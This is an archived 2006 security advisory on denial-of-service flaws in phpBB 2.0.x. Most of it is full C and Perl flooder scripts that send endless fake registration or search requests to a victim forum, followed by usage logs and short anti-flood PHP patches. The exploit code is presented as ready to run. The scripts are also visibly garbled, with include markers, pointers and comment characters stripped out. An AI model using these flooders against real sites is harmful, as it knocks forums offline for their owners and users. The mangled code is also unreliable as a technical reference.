phpBB <= 2.0.19 Multiple DoS vulnerabilities

2006-03-05T00:00:00
ID SECURITYVULNS:DOC:11695
Type securityvulns
Reporter Securityvulns
Modified 2006-03-05T00:00:00

Description

/*

[N]eo [S]ecurity [T]eam [NST]® - Advisory #18 - 03/03/06

Program: phpBB Homepage: http://www.phpbb.com Vulnerable Versions: All phpBB versions Risk: High Risk!! Impact: Multiple DoS Vulnerabilities.

-==phpBB Multiple DoS Vulnerabilities ==-

- Description

phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.

- Tested

many forums

- Explotation

profile.php << By registering as many users as you can. The registration has to ve deactived the security code image. search.php << by searching in a way that the db couln't observe it.

This vulnerability has discovered in the version 2.0.15 but it works in all versions if the security image code is not activ ated. The exploits used were published some months ago, you can check it out in www.neosecurityteam.net

- Exploit

[C Source] /* Name: NsT-phpBBDoS Copyright: NeoSecurityteam Author: HaCkZaTaN Date: 19/06/05 Description: xD You must figure out the problem xD

root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS [+] NsT-phpBBDoS v0.1 by HaCkZaTaN [+] NeoSecurityTeam [+] Dos has begun....[+]

[] Use: ./NsT-phpBBDoS [] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com [+] NsT-phpBBDoS v0.1 by HaCkZaTaN [+] [+] NeoSecurityTeam [+] [+] Dos has begun....[+]

................................. root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created" Let see how many users I have created root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE MACHTYPE=i486-slackware-linux-gnu root@NeoSecurity:/home/hackzatan#

*/

include <stdio.h>

include <stdlib.h>

include <string.h>

include <errno.h>

ifdef WIN32

include <winsock2.h>

pragma comment(lib, "ws2_32")

pragma pack(1)

define WIN32_LEAN_AND_MEAN

else

include <unistd.h>

include <sys/types.h>

include <sys/socket.h>

include <netinet/in.h>

include <arpa/inet.h>

include <netdb.h>

endif

define __USE_GNU

define _XOPEN_SOURCE

int Connection(char , int); void Write_In(int , char , char , char , int); char Use(char *);

int main(int argc, char argv[]) { int sock, x = 0; char Path = argv[1], Pro_Sea = argv[2], Host = argv[3];

puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN [+]"); puts("[+] NeoSecurityTeam [+]"); puts("[+] Dos has begun....[+] "); fflush(stdout);

if(argc != 4) Use(argv[0]);

while(1) { sock = Connection(Host,80); Write_In(sock, Path, Pro_Sea, Host, x);

ifndef WIN32

shutdown(sock, SHUT_WR); close(sock);

else

closesocket(sock); WSACleanup();

endif

Pro_Sea = argv[2]; x++; } //I don't think that it will get here =)

return 0; }

int Connection(char *Host, int Port) {

ifndef WIN32

define SOCKET int

else

int error; WSADATA wsadata; error = WSAStartup(MAKEWORD(2, 2), &wsadata);

if (error == SOCKET_ERROR) { perror("Could Not Start Up Winsock! "); return; }

endif

SOCKET sockfd; struct sockaddr_in sin; struct in_addr myaddr; struct hostent h;

if(Port <= 0 || Port > 65535) { puts("[-] Invalid Port Number "); fflush(stdout); exit(-1); }

if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket() "); fflush (stdout); exit(-1); }

if(isalpha(Host[0])) { if((h = gethostbyname(Host)) == NULL) { perror("gethostbyname() "); fflush (stdout); exit(-1); } } else { myaddr=(struct in_addr*)malloc(sizeof(struct in_addr)); myaddr->s_addr=inet_addr(Host);

if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL) { perror("gethostbyaddr() "); fflush (stdout); exit(-1); } }

memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = htons(Port); memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length);

if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0) { perror("connect() "); exit (-1); }

return sockfd; }

void Write_In(int sock, char Path, char Pro_Sea, char Host, int x) { char str1 = (char )malloc(4BUFSIZ), str2 = (char )malloc(4BUFSIZ); char NsT[] = "x4Ex65x6Fx53x65x63x75x72x69x74x79x54x65x61x6D"; char req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 " "Accept: / " "Accept-Language: en-us " "Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 " "Accept encoding: gzip,deflate " "Keep-Alive: 300 " "Proxy-Connection: keep-alive " "Content-Type: application/x-www-form-urlencoded " "Cache-Control: no-cache " "Pragma: no-cache "; char Profile = ".net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=spanish&style=4&timezone=1&dateformat=l%2C+d+F+Y%2C+H%3Ai&mode=register&agreed=true&coppa=0&submit=Enviar "; char Search = "&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200 ";

if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, "username=N1sT__%d&email=N1sT__%d%%40%s%s", x, x, NsT, Profile); else if(strcmp("search.php", Pro_Sea) == 0) { Pro_Sea = "search.php?mode=results"; sprintf(str1, "search_keywords=Nst_%d%s", x, Search); } else { puts("Sorry. Try making the right choice"); exit(-1); }

sprintf(str2, "POST %s%s HTTP/1.1 " "Host: %s " "Referer: http://%s/ %s" "Content-Length: %d

%s", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1);

write(sock, str2, strlen(str2)); write(1, ".", 1); fflush(stdout); }

char Use(char program) { fprintf(stderr,"[] Use: %s ", program); fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com ", program); fflush(stdout); exit(-1); }

/*

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ '@@@@@''@@'@@@''''''''@@''@@@''@@ '@@'@@@@@@''@@@@@@@@@'''''@@@ '@@'''@@@@'''''''''@@@''''@@@ @@@@''''@@'@@@@@@@@@@''''@@@@@

*/

/ EOF /


[Perl Source]

!/usr/bin/perl

Name: NsT-phpBBDoS (Perl Version)

Copyright: Neo Security Team

Author: HaCkZaTaN

Ported: g30rg3_x

Date: 20/06/05

Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x

A Simple phpBB Registration And Search DoS Flooder.

g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl

[+]

[+] NsT-phpBBDoS v0.2 by HaCkZaTaN

[+] ported to Perl By g30rg3_x

[+] Neo Security Team

[+]

[+] Host |without http://www.| victimshost.com

[+] Path |example. /phpBB2/ or /| /phpBB2/

[+] Flood Type |1=Registration 2=Search| 1

[+] ..........................................................

[+] ..........................................................

[+] ..........................................................

[+] ..............................................

[+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed

g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created"

use IO::Socket;

Initialized X

$x = 0;

Flood Variables Provided By User

print q( NsT-phpBBDoS v0.2 by HaCkZaTaN ported to Perl By g30rg3_x Neo Security Team

); print q(Host |without http://www.| ); $host = ; chop ($host);

print q(Path |example. /phpBB2/ or /| ); $pth = ; chop ($pth);

print q(Flood Type |1 = Registration, 2 = Search| ); $type = ; chop ($type);

If Type Is Equals To 1 or Registration

if($type == 1){

User Loop for 9999 loops (enough for Flood xDDDD)

while($x != 9999) {

Building User in base X

$uname = "username=NsT__" . "$x";

Building User Mail in base X

$umail = "&email=NsT__" . "$x";

Final String to Send

$postit = "$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";

Posit Length

$lrg = length $postit;

Connect Socket with Variables Provided By User

my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80", Proto => "tcp", ); die " The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $! " unless $sock;

Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums

print $sock "POST $pth"."profile.php HTTP/1.1 "; print $sock "Host: $host "; print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, / "; print $sock "Referer: $host "; print $sock "Accept-Language: en-us "; print $sock "Content-Type: application/x-www-form-urlencoded "; print $sock "Accept-Encoding: gzip, deflate "; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 "; print $sock "Connection: Keep-Alive "; print $sock "Cache-Control: no-cache "; print $sock "Content-Length: $lrg

"; print $sock "$postit "; close($sock);

Print a "." for every loop

syswrite STDOUT, ".";

Increment X in One for every Loop

$x++; }

If Type Is Equals To 2 or Search

} elsif ($type == 2){

User Search Loop for 9999 loops (enough for Flood xDDDD)

while($x != 9999) {

Final Search String to Send

$postit = "search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";

Posit Length

$lrg = length $postit;

Connect Socket with Variables Provided By User

my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80", Proto => "tcp", ); die " The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $! " unless $sock;

Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums

print $sock "POST $pth"."search.php?mode=results HTTP/1.1 "; print $sock "Host: $host "; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5 "; print $sock "Referer: $host "; print $sock "Accept-Language: en-us "; print $sock "Content-Type: application/x-www-form-urlencoded "; print $sock "Accept-Encoding: gzip, deflate "; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 "; print $sock "Connection: Keep-Alive "; print $sock "Cache-Control: no-cache "; print $sock "Content-Length: $lrg

"; print $sock "$postit "; close($sock);

Print a "." for every loop

syswrite STDOUT, ".";

Increment X in One for every Loop

$x++; } }else{

STF??? What Do You Type

die "Option not Allowed O_o??? "; }

- Solutions

/ Patch by Paisterist. Put this code after the "// Get current date" line / phpBB2/includes/usercp_register.php -usercp_register.php-

$flood=time()-120; $query=$db->sql_query("Select user_regdate from " . USERS_TABLE . " where user_regdate>='" . $flood . "' order by user_regdate desc"); if($db->sql_numrows($query)!=0) { $row=$db->sql_fetchrow($query); $error=TRUE; $error_msg="Protecciуn anti flood activada. Por favor espera " . $flood - $row['user_regdate'] . " segundos y manda los datos de vuelta."; } else { -usercp_register.php-

=================================== / Patch by Paisterist. Put this code after "// Define initial vars" / phpBB2/search.php -search.php- if ($_GET['mode']=="results") {

$fp=fopen("time.txt", "r"); $flood=fgets($fp, 1000); if($flood>=time()-5) { message_die(GENERAL_MESSAGE, "Protecciуn anti flood activada. Intenta unos segundos mбs tarde"); fclose($fp); exit(0); } else { $fp=fopen("time.txt", "w"); fwrite($fp, time()); fclose($fp); }

-search.php-

- References

http://www.neosecurityteam.net/index.php?action=advisories&id=18

- Credits

[C Exploit] by HaCkZaTaN [Perl Exploit] by g30rg3_x [Patch] by Paisterist

[N]eo [S]ecurity [T]eam [NST]® - http://www.neosecurityteam.net/

Got Questions? http://www.neosecurityteam.net/foro/

irc.fullnetwork.org #nst [NeoSecurity IRC]

- Greets

Daemon21 LINUX erg0t uyx CrashCool Makoki KingMetal r3v3ng4ns T0wn3r All Internal Fear Staff

Argentina, Mexico, Colombia, Chile, Uruguay EXISTS!!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ '@@@@@''@@'@@@''''''''@@''@@@''@@ '@@'@@@@@@''@@@@@@@@@'''''@@@ '@@'''@@@@'''''''''@@@''''@@@ @@@@''''@@'@@@@@@@@@@''''@@@@@ */

/ EOF /